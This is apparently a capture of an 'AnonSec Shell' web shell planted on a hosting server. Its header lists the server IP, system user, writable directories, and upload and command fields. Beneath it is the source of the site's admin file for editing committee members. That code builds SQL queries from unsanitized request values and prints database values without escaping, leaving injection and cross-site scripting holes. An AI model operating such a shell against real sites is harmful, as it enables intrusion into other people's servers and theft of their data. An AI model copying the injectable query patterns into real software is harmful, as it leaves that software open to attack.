AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/atfycaf/www/admin//committeeEdit.php
<?php
include "globalVars.php";
if (in_array(22, $adminPriv) || in_array(23, $adminPriv) || in_array(24, $adminPriv)) {
} else {
	header("Location: $ADurl");
}

if (isset($_GET["updateOrder"])) {
	foreach($_GET["listOrder"] as $orderCount => $committeeID) {
		mysqli_query($conn, "UPDATE committeeMembers SET memberOrder = '$orderCount' WHERE id = '$committeeID'");
	}

	$trackDate		= date("Y-m-d H:i:s");
	mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/committeeEdit.html', 'committeeMembers', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; changed the order of the committee members on the website')");

} else {

	include "header.php";

	if (isset($_POST["createPosition"])) {
		$memberPosition	= cleanPost($_POST["memberPosition"], $conn);

		$committeeOrderQuery = mysqli_query($conn, "SELECT memberOrder FROM committeeMembers ORDER BY memberOrder DESC LIMIT 0,1") or die (mysqli_error($conn));
		while ($cQ = mysqli_fetch_array($committeeOrderQuery)) {
			$memberOrder	= $cQ["memberOrder"];
		}
		$nextOrder	= $memberOrder + 1;

		mysqli_query($conn, "INSERT INTO committeeMembers (memberOrder, memberPosition) VALUES ('$nextOrder', '". addslashes($memberPosition) ."')");

		$trackDate		= date("Y-m-d H:i:s");
		mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/committeeEdit.html', 'committeeMembers', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; added the new committee position ". addslashes($memberPosition) ."')");

	} elseif (isset($_POST["deletePosition"])) {
		$commID		= $_POST["commID"];

		$committeeOrderQuery = mysqli_query($conn, "SELECT memberPosition FROM committeeMembers ORDER BY memberOrder DESC LIMIT 0,1") or die (mysqli_error($conn));
		while ($cQ = mysqli_fetch_array($committeeOrderQuery)) {
			$memberPosition	= $cQ["memberPosition"];
		}

		mysqli_query($conn, "DELETE FROM committeeMembers WHERE id = '$commID'");

		$trackDate		= date("Y-m-d H:i:s");
		mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/committeeEdit.html', 'committeeMembers', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; deleted the committee position ". addslashes($memberPosition) ."')");

	}
	?>

				<h2>Update the Committee Members</h2>

	<?php
	if (in_array(22, $adminPriv)) {
		?>
	<div class="descStTab" style="margin-bottom:40px;">
		<h3>Create a new Committee Position</h3>
		<form action="committeeEdit.html" method="post">
			<div class="pFormRow">
				<div class="pFormTitle">Position Title:</div>
				<div class="pFormInput">
					<input type="text" name="memberPosition" size="50" required />
					<div class="pFormLabel">
						<label class="labelName">Position Title:</label>
					</div>
				</div>
			</div>
			<input type="submit" class="submitButton" name="createPosition" value="Create this Position" />
		</form>
	</div>
		<?php
	}
	?>
	<div class="descStTab" style="margin-bottom:40px;">
		<h3>Current Committee Members</h3>
		<p>To change the order the committee members appear on the website simply click and hold the <i class="fas fa-grip-horizontal"></i> next to the member and drag them to where you want and release.</p>
		<ul id="committeeSortable">
	<?php
	$committeeQuery = mysqli_query($conn, "SELECT * FROM committeeMembers ORDER BY memberOrder ASC") or die (mysqli_error());
	while ($cQ = mysqli_fetch_array($committeeQuery)) {
		$commID			= $cQ["id"];
		$memberName		= $cQ["memberName"];
		$memberPosition	= $cQ["memberPosition"];
		if (trim($memberName) == "") {
			$memberName	= "T.B.A.";
		}
		?>
			<li class="committeeRow" data-cid="<?php echo $commID ?>">
				<i class="fas fa-grip-horizontal"></i>
				<div class="pFormEditTitle">
					<?php echo $memberPosition ?><br><br>
					<span style="font-weight:400; font-size:14px;"><?php echo $memberName ?></span>
				</div>
				<div class="pFormEditButtons">
				<?php
				if (in_array(23, $adminPriv)) {
					?>
					<form action="committeeEditU.html" method="post">
						<input type="hidden" name="commID" value="<?php echo $commID ?>">
						<button class="submitButton" name="getMember">Edit Position</button>
					</form>
					<?php
				}
				if (in_array(24, $adminPriv)) {
					?>
					<button type="button" class="deleteButton deleteConfirm" data-cid="<?php echo $commID ?>" data-cn="<?php echo $memberPosition ?>">Delete Position</button>
					<?php
				}
				?>
				</div>
			</li>
		<?php
	}
	?>
		</ul>
	</div>

	<div id="deleteConfirmPop" class="deletePop">
		<div class="deletePopBG">
			<div class="deletePopContainer">
				<h4>Confirm Delete</h4>
				<p>Are you sure you want to delete the Committee Position <span id="memberNameC"></span>?</p>
				<form action="committeeEdit.html" method="post">
					<input type="hidden" name="commID" id="cidInputC" value="">
					<div class="pForm50">
						<button type="button" class="submitButton cancelDeleteC">No</button>
					</div>
					<div class="pForm50">
						<button class="deleteButton" name="deletePosition">Yes, Delete it</button>
					</div>
				</form>
			</div>
		</div>
	</div>
	<?php
	include "footer.php";
}
?>

Anon7 - 2022
AnonSec Team